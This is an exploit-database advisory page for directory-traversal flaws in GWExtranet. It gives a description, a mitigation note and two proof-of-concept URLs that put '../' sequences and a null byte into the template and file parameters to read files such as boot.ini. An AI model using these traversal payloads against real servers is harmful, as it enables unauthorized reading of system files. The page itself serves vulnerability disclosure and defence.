header-logo
Suggest Exploit
vendor:
GWExtranet
by:
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: GWExtranet
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

GWExtranet Multiple Directory Traversal Vulnerabilities

The GWExtranet application is prone to multiple directory-traversal vulnerabilities due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the webserver process, potentially obtaining sensitive information that may aid in further attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly sanitize and validate user-supplied input before using it in file operations. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26525/info

GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks. 

http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll